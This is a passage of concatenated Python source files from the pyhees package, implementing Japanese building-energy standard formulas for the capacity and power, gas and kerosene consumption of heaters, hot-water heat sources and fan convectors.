Args:
q_max_H(float): 最大暖房能力
Returns:
float: 連続運転時最小能力
"""
q_min_H = 0.4334 * q_max_H - 540.1 # (2)
return max(0.0, q_min_H)
# ============================================================================
# A.4 定格燃料効率
# ============================================================================
def get_e_rtd_H_default():
"""定格燃料効率
Args:
Returns:
float: 定格燃料効率
"""
return 0.860
def get_e_rtd_H(e_rtd_H_raw):
"""
Args:
e_rtd_H_raw:
Returns:
"""
return round(e_rtd_H_raw * 1000) / 1000
# ============================================================================
# A.5 定格暖房消費電力
# ============================================================================
def get_P_rtd_H(q_max_H):
"""定格暖房消費電力
Args:
q_max_H(float): 最大暖房能力
Returns:
float: 定格暖房消費電力
"""
return 3.13 / 1000 * q_max_H # (3)
# ============================================================================
# A.6 断続時消費電力
# ============================================================================
def get_P_itm_H():
"""断続時消費電力
Args:
Returns:
float: 断続時消費電力
"""
return 40.0
# ============================================================================
# A.7 複数の FF 暖房機が設置される場合の仕様の決定方法
# ============================================================================
def get_e_rtd_from_multi_devices(e_rtd_list):
"""複数の FF 暖房機が設置される場合の仕様の決定方法
Args:
e_rtd_list(list: list: list): 定格エネルギー消費効率の配列
Returns:
float: 複数の FF 暖房機が設置される場合の仕様の決定方法
"""
return min(e_rtd_list)
```
#### File: src/pyhees/section4_4.py
```python
import numpy as np
from pyhees.section4_1_Q import get_Q_T_H_d_t_i
# ============================================================================
# 5. 最大暖房出力
# ============================================================================
def get_Q_max_H_d_t(q_max_H):
"""最大暖房出力
Args:
q_max_H(float): 最大暖房能力
Returns:
ndarray: 最大暖房出力
"""
return np.ones(24 * 365) * q_max_H * 3600 * 10 ** (-6) # (1)
# ============================================================================
# 6. 暖房エネルギー消費量
# ============================================================================
# ============================================================================
# 6.1 消費電力量
# ============================================================================
def calc_E_E_H_d_t(q_max_H, q_min_H, P_rtd_H, P_itm_H, L_H_d_t):
"""消費電力量
Args:
q_max_H(float): 最大暖房能力
q_min_H(float): 連続運転時最小能力
P_rtd_H(float): 定格暖房消費電力
P_itm_H(float): 断続時消費電力
L_H_d_t(ndarray): 暖冷房区画の1時間当たりの暖房負荷
Returns:
ndarray: 消費電力量
"""
# 最大暖房出力
Q_max_H_d_t = get_Q_max_H_d_t(q_max_H)
# 処理暖房負荷
Q_T_H_d_t = get_Q_T_H_d_t_i(Q_max_H_d_t, L_H_d_t)
# 消費電力量
tmp1 = P_rtd_H * Q_T_H_d_t / Q_max_H_d_t * 10 ** (-3)
tmp1[Q_T_H_d_t < q_min_H * 3600 * 10 ** (-6)] = 0.0
tmp2 = (P_rtd_H * Q_T_H_d_t / Q_max_H_d_t + P_itm_H) * 10 ** (-3)
tmp2[Q_T_H_d_t >= q_min_H * 3600 * 10 ** (-6)] = 0.0
E_E_H_d_t = tmp1 + tmp2
# ただし、Q_T_H_d_tが0の場合は0
E_E_H_d_t[Q_T_H_d_t == 0] = 0
return E_E_H_d_t
# ============================================================================
# 6.2 ガス消費量
# ============================================================================
def calc_E_G_H_d_t(fuel, q_max_H, e_rtd_H, L_H_d_t):
"""ガス消費量
Args:
fuel(string): G'か'K'の値をとる
q_max_H(float): 最大暖房能力
e_rtd_H(float): 定格暖房エネルギー消費効率
L_H_d_t(ndarray): 暖冷房区画の1時間当たりの暖房負荷
Returns:
ndarray: ガス消費量
Raises:
ValueError: fuel が 'G'か'K' 以外の場合に発生する
"""
if fuel == 'G':
return calc_E_F_H_d_t(q_max_H, e_rtd_H, L_H_d_t)
elif fuel == 'K':
return np.zeros(24 * 365)
else:
raise ValueError(fuel)
# ============================================================================
# 6.3 灯油消費量
# ============================================================================
def calc_E_K_H_d_t(fuel, q_max_H, e_rtd_H, L_H_d_t):
"""灯油消費量
Args:
fuel(string): G'か'K'の値をとる
q_max_H(float): 最大暖房能力
e_rtd_H(float): 定格暖房エネルギー消費効率
L_H_d_t(ndarray): 暖冷房区画の1時間当たりの暖房負荷
Returns:
ndarray: 灯油消費量
Raises:
ValueError: fuel が 'G'か'K' 以外の場合に発生する
"""
if fuel == 'K':
return calc_E_F_H_d_t(q_max_H, e_rtd_H, L_H_d_t)
elif fuel == 'G':
return np.zeros(24 * 365)
else:
raise ValueError(fuel)
# ============================================================================
# 6.4 その他の燃料による一次エネルギー消費量
# ============================================================================
def get_E_M_H_d_t():
"""その他の燃料による一次エネルギー消費量
Args:
Returns:
ndarray: その他の燃料による一次エネルギー消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# 7.燃料消費量
# ============================================================================
def calc_E_F_H_d_t(q_max_H, e_rtd_H, L_H_d_t):
"""燃料消費量
Args:
q_max_H(float): 最大暖房能力
e_rtd_H(float): 定格暖房エネルギー消費効率
L_H_d_t(ndarray): 暖冷房区画の1時間当たりの暖房負荷
Returns:
ndarray: 燃料消費量
"""
# 最大暖房出力
Q_max_H_d_t = get_Q_max_H_d_t(q_max_H)
# 処理暖房負荷
Q_T_H_d_t = get_Q_T_H_d_t_i(Q_max_H_d_t, L_H_d_t)
E_F_H_d_t = Q_T_H_d_t / e_rtd_H # (3)
return E_F_H_d_t
def calc_Q_UT_H_d_t(q_max_H, L_H_d_t):
"""未処理暖房負荷
Args:
q_max_H(float): 最大暖房能力
L_H_d_t(ndarray): 暖冷房区画の1時間当たりの暖房負荷
Returns:
ndarray: 未処理暖房負荷
"""
# 最大暖房出力
Q_max_H_d_t = get_Q_max_H_d_t(q_max_H)
# 処理暖房負荷
Q_T_H_d_t = get_Q_T_H_d_t_i(Q_max_H_d_t, L_H_d_t)
# 未処理暖房負荷
Q_UT_H_d_t = L_H_d_t - Q_T_H_d_t
return Q_UT_H_d_t
```
#### File: src/pyhees/section4_6_a.py
```python
def get_q_rtd_H(q_rq_H, A_HCZ, f_cT, f_cI):
"""定格暖房能力
Args:
q_rq_H(float): 単位面積当たりの必要暖房能力
A_HCZ(float): 暖冷房区画の床面積
f_cT(float): 外気温度補正係数
f_cI(float): 間歇運転能力補正係数
Returns:
float: 定格暖房能力
"""
return q_rq_H * A_HCZ * f_cT * f_cI # (1)
# 単位面積当たりの必要暖房能力
def calc_q_rq_H(region):
"""単位面積当たりの必要暖房能力
Args:
region(int): 地域区分
Returns:
float: 単位面積当たりの必要暖房能力
"""
table_a_2 = get_table_a_2()
return table_a_2[region - 1]
# 外気温度補正係数
def get_f_cT(region):
"""外気温度補正係数
Args:
region(int): 地域区分
Returns:
float: 外気温度補正係数
"""
return 1.05
# 間歇運転能力補正係数
def calc_f_cI(mode, R_type):
"""間歇運転能力補正係数
Args:
mode(str): 運転方式
R_type(string): 居室の形式
Returns:
float: 間歇運転能力補正係数
Raises:
ValueError: modeが'ろ', '連続', 'は', '間歇'以外の場合に発生
ValueError: R_typeが'主たる居室', 'その他の居室'以外の場合に発生
"""
if mode in ['ろ', '連続']:
y = 0
elif mode in ['は', '間歇']:
y = 1
else:
raise ValueError(mode)
if R_type == '主たる居室':
x = 0
elif R_type == 'その他の居室':
x = 1
else:
raise ValueError(R_type)
table_a_3 = get_table_a_3()
return table_a_3[y][x]
def get_table_a_2():
"""表A.2 単位面積当たりの必要暖房能力
Args:
Returns:
list: 単位面積当たりの必要暖房能力
"""
# 表A.2 単位面積当たりの必要暖房能力
table_a_2 = [
139.3,
120.7,
111.3,
119.0,
126.6,
106.5,
112.9
]
return table_a_2
def get_table_a_3():
"""表A.3 間歇運転能力補正係数
Args:
Returns:
list: 間歇運転能力補正係数
"""
# 表A.3 間歇運転能力補正係数
table_a_3 = [
(1.0, 1.0),
(3.034, 4.805)
]
return table_a_3
# ============================================================================
# A.3 蓄熱効率
# ============================================================================
def get_e_rtd_H():
"""蓄熱効率
Args:
Returns:
float: 蓄熱効率
"""
return 0.850
```
#### File: src/pyhees/section4_7_c.py
```python
import numpy as np
import pyhees.section4_7_h as appendix_H
# ============================================================================
# C.2 エネルギー消費量
# ============================================================================
# ============================================================================
# C.2.1 消費電力量
# ============================================================================
def calc_E_E_hs(Q_out_H_hs, r_WS_hs):
"""消費電力量 (1)
Args:
Q_out_H_hs(ndarray): 1時間当たりの熱源機暖房出力 (MJ/h)
r_WS_hs(ndarray): 1時間平均の温水暖房用熱源機の温水供給運転率
Returns:
ndarray: 消費電力量
"""
# 電気ヒーターの消費電力量
E_E_hs_htr = get_E_E_hs_htr(Q_out_H_hs)
# 送水ポンプの消費電力量
E_E_hs_pmp = calc_E_E_hs_pmp(r_WS_hs)
return E_E_hs_htr + E_E_hs_pmp
def get_E_E_hs_htr(Q_out_H_hs):
"""電気ヒーターの消費電力量 (2)
Args:
Q_out_H_hs(ndarray): 1時間当たりの熱源機暖房出力 (MJ/h)
Returns:
ndarray: 電気ヒーターの消費電力量 (2)
"""
return Q_out_H_hs * 10 ** 3 / 3600
def calc_E_E_hs_pmp(r_WS_hs):
"""送水ポンプの消費電力量 (3)
Args:
r_WS_hs(ndarray): 1時間平均の温水暖房用熱源機の温水供給運転率
Returns:
ndarray: 送水ポンプの消費電力量
"""
# 送水ポンプの消費電力
P_hs_pmp = get_P_hs_pmp()
return P_hs_pmp * r_WS_hs * 10 ** (-3)
def get_P_hs_pmp():
"""送水ポンプの消費電力
Args:
Returns:
float: 送水ポンプの消費電力
"""
return 90
# ============================================================================
# C.2.2 ガス消費量
# ============================================================================
def get_E_G_hs():
"""ガス消費量
Args:
Returns:
ndarray: ガス消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# C.2.3 灯油消費量
# ============================================================================
def get_E_K_hs():
"""灯油消費量
Args:
Returns:
ndarray: 灯油消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# C.2.4 その他の一次エネルギー消費量
# ============================================================================
def get_E_M_hs():
"""その他の一次エネルギー消費量
Args:
Returns:
ndarray: その他の一次エネルギー消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# C.3 最大暖房出力
# ============================================================================
def calc_Q_max_H_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh):
"""最大暖房出力 (4)
Args:
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue
Returns:
ndarray: 最大暖房出力
"""
# 定格能力
q_rtd_hs = get_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
return np.ones(24*365) * q_rtd_hs * 3600 / (10 ** 6)
def get_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh):
"""温水暖房用熱源機の定格能力
Args:
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue
Returns:
float: 温水暖房用熱源機の定格能力
"""
# 付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい
return appendix_H.calc_q_max_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
```
#### File: src/pyhees/section4_7_d.py
```python
import pyhees.section4_7_h as appendix_H
import numpy as np
# ============================================================================
# D.2 エネルギー消費量
# ============================================================================
# ============================================================================
# D.2.1 消費電力量
# ============================================================================
def calc_E_E_hs(Q_out_H_hs, Q_max_H_hs, Q_dmd_H_hs_d_t, Theta_SW_hs, Theta_ex, q_rtd_hs):
"""1時間当たりの消費電力量 (1)
Args:
Q_out_H_hs(ndarray): 1時間当たりの温水暖房用熱源機の暖房出力 (MJ/h)
Q_max_H_hs(ndarray): 熱源機の最大暖房出力 (MJ/h)
Q_dmd_H_hs_d_t(ndarray): 1時間当たりの熱源機の熱需要 (MJ/h)
Theta_SW_hs(ndarray): 温水暖房用熱源機の往き温水温度
Theta_ex(ndarray): 外気温度
q_rtd_hs(float): 温水暖房用熱源機の定格能力 (W)
Returns:
ndarray: 1時間当たりの消費電力量
"""
# 定格効率
e_rtd = get_e_rtd()
# 定格消費電力
P_rtd_hs = get_P_rtd_hs(q_rtd_hs, e_rtd)
# 1 時間平均の温水暖房用熱源機の効率
e_hs = calc_e_hs(Q_max_H_hs, Theta_SW_hs, Theta_ex, Q_out_H_hs, P_rtd_hs)
# 消費電力量
E_E_hs = Q_out_H_hs / e_hs * 10 ** 3 / 3600
E_E_hs[Q_dmd_H_hs_d_t == 0] = 0
return E_E_hs
def calc_e_hs(Q_max_H_hs, Theta_SW_hs, Theta_ex, Q_out_H_hs, P_rtd_hs):
"""1時間平均の温水暖房用熱源機の効率 (2)
Args:
Q_max_H_hs(ndarray): 熱源機の最大暖房出力 (MJ/h)
Theta_SW_hs(ndarray): 温水暖房用熱源機の往き温水温度
Theta_ex(ndarray): 外気温度
Q_out_H_hs(ndarray): 1時間当たりの温水暖房用熱源機の暖房出力 (MJ/h)
P_rtd_hs(float): 温水暖房用熱源機の定格消費電力 (W)
Returns:
ndarray: 1時間平均の温水暖房用熱源機の効率
"""
# 1時間平均の効率比
e_r_hs = get_e_r_hs(Theta_SW_hs, Theta_ex, Q_out_H_hs, Q_max_H_hs)
# 最大消費電力
P_max_hs = get_P_max_hs(P_rtd_hs)
return (Q_max_H_hs * 10 ** 6 / 3600) / P_max_hs * e_r_hs
def get_P_max_hs(P_rtd_hs):
"""最大消費電力 (3)
Args:
P_rtd_hs(float): 温水暖房用熱源機の定格消費電力 (W)
Returns:
float: 最大消費電力
"""
return P_rtd_hs / 0.6
def get_P_rtd_hs(q_rtd_hs, e_rtd):
"""定格消費電力 (4)
Args:
q_rtd_hs(float): 温水暖房用熱源機の定格能力 (W)
e_rtd(float): 当該給湯機の効率
Returns:
float: 定格消費電力
"""
return q_rtd_hs / e_rtd
def get_e_rtd():
"""定格効率
Args:
Returns:
float: 定格効率
"""
return 4.05
def calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh):
"""定格能力 (5)
Args:
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue
Returns:
float: 定格能力 (5)
"""
# 最大能力
q_max_hs = appendix_H.calc_q_max_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
return q_max_hs * 0.8
def get_e_r_hs(Theta_SW_hs, Theta_ex, Q_out_H_hs, Q_max_H_hs):
"""1時間平均の効率比 (6)
Args:
Theta_SW_hs(ndarray): 温水暖房用熱源機の往き温水温度
Theta_ex(ndarray): 外気温度
Q_out_H_hs(ndarray): 1時間当たりの温水暖房用熱源機の暖房出力 (MJ/h)
Q_max_H_hs(ndarray): 熱源機の最大暖房出力 (MJ/h)
Returns:
ndarray: 1時間平均の効率比 (6)
"""
return (1.120656 - 0.03703 * (Theta_SW_hs - Theta_ex)) * (1 - Q_out_H_hs / Q_max_H_hs) ** 2 \
+ (-0.36786 + 0.012152 * (Theta_SW_hs - Theta_ex)) * (1 - Q_out_H_hs / Q_max_H_hs) \
+ 1
# ============================================================================
# D.2.2 ガス消費量
# ============================================================================
def get_E_G_hs():
"""ガス消費量
Args:
Returns:
ndarray: ガス消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# D.2.3 灯油消費量
# ============================================================================
def get_E_K_hs():
"""灯油消費量
Args:
Returns:
ndarray: 灯油消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# D.2.4 その他の一次エネルギー消費量
# ============================================================================
def get_E_M_hs():
"""
Args:
Returns:
ndarray: その他の一次エネルギー消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# D.3 最大暖房出力
# ============================================================================
def calc_Q_max_H_hs(q_rtd_hs, Theta_SW_hs, Theta_ex, h_ex):
"""最大暖房出力 (7)
Args:
q_rtd_hs(float): 温水暖房用熱源機の定格能力 (W)
Theta_SW_hs(ndarray): 温水暖房用熱源機の往き温水温度
Theta_ex(ndarray): 外気温度
h_ex(ndarray): 外気相対湿度
Returns:
最大暖房出力 (7)
"""
# デフロスト補正係数
C_def = get_C_def(Theta_ex, h_ex)
return (11.62 + 0.2781 * Theta_ex - 0.00113 * Theta_ex ** 2 - 0.1271 * Theta_SW_hs - 0.00363 * Theta_ex * Theta_SW_hs) \
* (q_rtd_hs / 6) * (C_def / 0.85) * 3600 * 10 ** (-6)
def get_C_def(Theta_ex, h_ex):
"""デフロスト補正係数
Args:
Theta_ex(ndarray): 外気温度
h_ex(ndarray): 外気相対湿度
Returns:
ndarray: デフロスト補正係数
"""
C_def = np.zeros(24 * 365)
C_def[:] = 1
C_def[(Theta_ex < 5) * (h_ex >= 80)] = 0.85
return C_def
```
#### File: src/pyhees/section4_7_h.py
```python
from pyhees.section3_1 import get_A_HCZ_i
# ============================================================================
# H.2 温水暖房用熱源機の最大能力
# ============================================================================
def calc_q_max_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh):
"""温水暖房用熱源機の最大能力 (1)
Args:
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_MR_hwh: 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_OR_hwh: returns: 温水暖房用熱源機の最大能力 (W)
Returns:
float: 温水暖房用熱源機の最大能力 (W)
"""
# 単位面積当たりの必要暖房能力
q_rq_H = get_q_rq_H(region, has_MR_hwh, has_OR_hwh)
# 外気温度補正係数
f_cT = get_f_cT()
# 間歇運転能力補正係数
f_cI = get_f_cI(mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 暖冷房区画の床面積(温水暖房により暖 房される暖冷房区画のみを積算する)
A_HCZ_hs = 0
if has_MR_hwh:
A_HCZ_hs = get_A_HCZ_i(1, A_A, A_MR, A_OR)
if has_OR_hwh:
A_HCZ_hs = A_HCZ_hs + sum([get_A_HCZ_i(i, A_A, A_MR, A_OR) for i in range(2, 6)])
return q_rq_H * A_HCZ_hs * f_cT * f_cI
def get_q_rq_H(region, has_MR_hwh, has_OR_hwh):
"""単位面積当たりの必要暖房能力 (W/m2)
Args:
region(int): 省エネルギー地域区分
has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue
Returns:
float: 単位面積当たりの必要暖房能力 (W/m2)
"""
if has_MR_hwh and has_OR_hwh:
return get_table_h_3()[region - 1][0]
elif has_MR_hwh:
return get_table_h_3()[region - 1][1]
elif has_OR_hwh:
return get_table_h_3()[region - 1][2]
else:
raise ValueError('温水暖房の放熱器を主たる居室にもその他の居室にも設置しない場合の単位面積当たりの必要暖房能力は定義されません。')
def get_f_cT():
"""外気温度補正係数
Args:
Returns:
float: 外気温度補正係数
"""
return 1.05
def get_f_cI(mode_MR, mode_OR, has_MR_hwh, has_OR_hwh):
"""間歇運転能力補正係数
Args:
mode_MR(str): 主たる居室の運転方法 (連続運転|間歇運転)
mode_OR(str): その他の居室の運転方法 (連続運転|間歇運転)
has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue
Returns:
float: 間歇運転能力補正係数
"""
def normalize_mode(s):
"""
Args:
s:
Returns:
"""
if s == 'は':
return '間歇運転'
if s == 'ろ':
return '連続運転'
return s
mode_MR = normalize_mode(mode_MR)
mode_OR = normalize_mode(mode_OR)
if has_MR_hwh and has_OR_hwh:
if mode_MR == '連続運転':
if mode_OR == '連続運転':
return get_table_h_4()[0]
elif mode_OR == '間歇運転':
return get_table_h_4()[1]
else:
raise ValueError(mode_OR)
elif mode_MR == '間歇運転':
if mode_OR == '連続運転':
return get_table_h_4()[2]
elif mode_OR == '間歇運転':
return get_table_h_4()[3]
else:
raise ValueError(mode_MR)
else:
raise ValueError(mode_MR)
elif has_MR_hwh:
if mode_MR == '連続運転':
return get_table_h_4()[4]
elif mode_MR == '間歇運転':
return get_table_h_4()[5]
else:
raise ValueError(mode_MR)
elif has_OR_hwh:
if mode_OR == '連続運転':
return get_table_h_4()[6]
elif mode_OR == '間歇運転':
return get_table_h_4()[7]
else:
raise ValueError(mode_OR)
def get_table_h_3():
"""表 H.3 単位面積当たりの必要暖房能力
Args:
Returns:
list: 表 H.3 単位面積当たりの必要暖房能力
"""
table_h_3 = [
(90.02, 139.26, 62.28),
(77.81, 120.65, 53.26),
(73.86, 111.32, 53.81),
(77.74, 118.98, 55.41),
(83.24, 126.56, 59.43),
(69.76, 106.48, 49.94),
(74.66, 112.91, 53.48)
]
return table_h_3
def get_table_h_4():
"""表 H.4 間歇運転能力補正係数
Args:
Returns:
list: 表 H.4 間歇運転能力補正係数
"""
table_h_4 = [
1.0,
1.0,
2.25,
2.25,
1.0,
3.03,
1.0,
1.62
]
return table_h_4
```
#### File: src/pyhees/section4_7_k.py
```python
import numpy as np
import pyhees.section4_7_m as appendix_M
# ============================================================================
# K.2 消費電力量
# ============================================================================
def calc_E_E_rad(region, mode, A_HCZ, R_type, Theta_SW, Q_T_H_rad):
"""放熱器の消費電力量 (1)
Args:
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
A_HCZ(float): 暖冷房区画の床面積
R_type(string): 居室の形式
Theta_SW(ndarray): 往き温水温度 (℃)
Q_T_H_rad(ndarray): 放熱器の処理暖房負荷
Returns:
ndarray: 放熱器の消費電力量 (1)
"""
# ファンコンベクターの最大能力及び最小能力
q_max_FC = calc_q_max_FC(region, mode, A_HCZ, R_type)
q_min_FC = get_q_min_FC(q_max_FC)
# ファンコンベクターの最大暖房出力及び最小暖房出力
Q_max_H_FC = get_Q_max_H_FC(Theta_SW, q_max_FC)
Q_min_H_FC = get_Q_min_H_FC(Theta_SW, q_min_FC)
# ファンコンベクターの最大消費電力及び最小消費電力
P_max_FC = get_P_max_FC(q_max_FC)
P_min_FC = get_P_min_FC(q_min_FC)
# (1a)
tmp_1a = P_min_FC * (Q_T_H_rad / Q_min_H_FC) * 10 ** (-3)
tmp_1a[np.logical_not(Q_T_H_rad <= Q_min_H_FC)] = 0
# (1b)
tmp_1b = (P_min_FC * (Q_max_H_FC - Q_T_H_rad) / (Q_max_H_FC - Q_min_H_FC) + P_max_FC * (Q_T_H_rad - Q_min_H_FC) / (
Q_max_H_FC - Q_min_H_FC)) * 10 ** (-3)
tmp_1b[np.logical_not(np.logical_and(Q_min_H_FC < Q_T_H_rad, Q_T_H_rad < Q_max_H_FC))] = 0
# (1c)
tmp_1c = P_max_FC * 10 ** (-3) * np.ones_like(Q_T_H_rad)
tmp_1c[np.logical_not(Q_max_H_FC <= Q_T_H_rad)] = 0
E_E_rad = tmp_1a + tmp_1b + tmp_1c
return E_E_rad
# ============================================================================
# K.3 温水供給運転率
# ============================================================================
def get_r_WS_rad(Q_T_H_rad, Q_min_H_FC):
"""温水供給運転率 (2)
Args:
Q_T_H_rad(ndarray): 1時間当たりの放熱器の処理暖房負荷 (MJ/h)
Q_min_H_FC(ndarray): 1時間当たりのファンコンベクターの最小暖房出力 (MJ/h)
Returns:
ndarray: 温水供給運転率
"""
return Q_T_H_rad / Q_min_H_FC
# ============================================================================
# K.4 最大暖房出力
# ============================================================================
def calc_Q_max_H_rad(Theta_SW, q_max_FC):
"""最大暖房出力
Args:
Theta_SW(ndarray): 往き温水温度 (℃)
q_max_FC(ndarray): ファンコンベクターの最大能力 (W)
Returns:
ndarray: 最大暖房出力
"""
return get_Q_max_H_FC(Theta_SW, q_max_FC)
# ============================================================================
# K.5 ファンコンベクターの最大暖房出力及び最小暖房出力
# ============================================================================
def get_Q_max_H_FC(Theta_SW, q_max_FC):
"""ファンコンベクターの最大暖房出力 (3a)
Args:
Theta_SW(ndarray): 往き温水温度 (℃)
q_max_FC(ndarray): ファンコンベクターの最大能力(W)
Returns:
ndarray: ファンコンベクターの最大暖房出力 (3a)
"""
return q_max_FC * (Theta_SW - 20) / (60 - 20) * 3600 * 10 ** (-6)
def get_Q_min_H_FC(Theta_SW, q_min_FC):
"""ファンコンベクターの最小暖房出力 (3b)
Args:
Theta_SW(ndarray): 往き温水温度 (℃)
q_min_FC(ndarray): ファンコンベクターの最小能力 (W)
Returns:
ndarray: ファンコンベクターの最小暖房出力 (3b)
"""
return q_min_FC * (Theta_SW - 20) / (60 - 20) * 3600 * 10 ** (-6)
def calc_q_max_FC(region, mode, A_HCZ, R_type):
"""ファンコンベクターの最大能力
Args:
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
A_HCZ(float): 暖冷房区画の床面積
R_type(string): 居室の形式
Returns:
ndarray: ファンコンベクターの最大能力
"""
# 付録Mに定める放熱器の最大能力 q_max_rad に等しいものとする
return appendix_M.calc_q_max_rad(region, mode, A_HCZ, R_type)
def get_q_min_FC(q_max_FC):
"""ファンコンベクターの最小能力 (4)
Args:
q_max_FC(ndarray): ファンコンベクターの最大能力 (W)
Returns:
ndarray: ファンコンベクターの最小能力
"""
return 0.4859 * q_max_FC
# ============================================================================
# K.6 ファンコンベクターの最大消費電力及び最小消費電力
# ============================================================================
def get_P_max_FC(q_max_FC):
"""ファンコンベクターの最大消費電力 (5a)
Args:
q_max_FC(ndarray): ファンコンベクターの最大能力 (W)
Returns:
ndarray: ァンコンベクターの最大消費電力
"""
return 7.564 * 10 ** (-3) * q_max_FC
def get_P_min_FC(q_min_FC):
"""ファンコンベクターの最小消費電力 (5b)
Args:
q_min_FC(ndarray): ファンコンベクターの最小能力 (W)
Returns:
ndarray: ファンコンベクターの最小消費電力
"""
return 7.783 * 10 ** (-3) * q_min_FC
```
#### File: src/pyhees/section4_7_n.py
```python
import numpy as np
from pyhees.section4_7_common import get_Q_out_H_hs_d_t
from pyhees.section4_8_a import calc_e_ref_H_th
import pyhees.section4_7_h as appendix_H
# ============================================================================
# N3. 暖房エネルギー消費量
# ============================================================================
# ============================================================================
# N.3.1 消費電力量
# ============================================================================
def calc_E_E_hs_d_t(Q_dmd_H_hs_d_t, Theta_ex_a_Ave, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_SW_d_t, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType):
"""日付dの時刻tにおける1時間当たりの温水暖房用熱源機の消費電力量 (1)
Args:
Q_dmd_H_hs_d_t(ndarray): 1時間当たりの熱源機の熱需要 (MJ/h)
Theta_ex_a_Ave(float): 年平均外気温度 (℃)
Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃)
Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃)
Theta_SW_d_t(ndarray): 往き温水温度 (℃)
q_max_hs(float): 熱源機の最大暖房能力 ⒲
L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷
L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h)
L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h)
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
ndarray: 1時間当たりの熱源機の消費電力量 (kWh/h)
"""
# ---------- 地中熱交換器からの戻り熱源水の日平均温度 ----------
# 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c)
L_max_C = get_L_max_C(L_CS_x_t_i, L_CL_x_t_i)
# 1日当たりの暖房負荷の年間最大値(MJ/d)(20b)
L_max_H = get_L_max_H(L_H_x_t_i)
# 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a)
R_L_max = get_R_L_max(L_max_H, L_max_C)
# 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19)
K_gsRW_H = calc_K_gsRW_H(R_L_max, HeatExchangerType)
# 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18)
Delta_Theta_gsRW_H = calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType)
# 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17)
Theta_gsRW_d_ave_d = get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H)
# ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 ----------
# 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(16)
q_max_H_hs_JRA = calc_q_max_H_hs_JRA(q_max_hs)
# ---------- 温水暖房用熱源機内の平均放熱損失 ----------
# 日付dの時刻tにおける温水暖房用の熱源機内部の平均放熱損失 (kw) (N.9)
q_loss_H_hs_d_t = get_q_loss_H_hs_d_t()
